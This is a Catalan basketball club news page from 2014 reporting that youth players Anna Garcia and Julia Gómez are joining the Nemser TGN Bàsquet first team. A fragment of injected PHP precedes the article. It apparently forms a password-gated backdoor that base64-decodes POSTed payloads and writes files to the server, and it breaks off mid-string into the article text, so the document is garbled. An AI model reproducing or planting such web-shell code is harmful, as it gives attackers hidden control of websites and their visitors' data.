function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Anna Garcia i Julia Gómez s'incorporen definitivament al Nemser TGN Bàsquet - Tgn Bàsquet Club -

Anna Garcia i Julia Gómez s’incorporen definitivament al Nemser TGN Bàsquet

By
Updated: agost 4, 2014

El Nemser TGN Bàsquet continua perfilant la seva plantilla en vista el curs vinent. Així, les jugadores del planter Anna Garcia i Julia Gómez jugaran en el primer equip aquesta temporada després de la bona feina feta la campanya anterior. Garcia, que militava en l’equip Júnior A, va disputar alguns partits arran de les nombroses lesions del Sènior A i el seu bon paper li ha valgut ara l’ascens al vaixell insígnia de l’entitat lila. Garcia és una exterior polivalent que destaca, sobretot, per la seva gran velocitat. La segona alta en l’equip de Jordi Hernández és Julia Gómez. Aquesta pivot va militar en el Sènior B el curs passat, tot i que entrenava amb el primer equip. Gómez va anar convocada en molts dels partits del Nemser TGN Bàsquet i hi va jugar alguns minuts. Es tracta d’una pivot forta que aporta defensa i rebot i solidesa sota el cèrcol.

Ambdues jugadores, per tant, coneixen perfectament les seves noves companyes, doncs han compartit entrenaments i minuts en competició. Aquesta és, doncs, una nova aposta per part del TGN Bàsquet per tal de confiar en les jugadores de casa.

 

IMGP5372

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *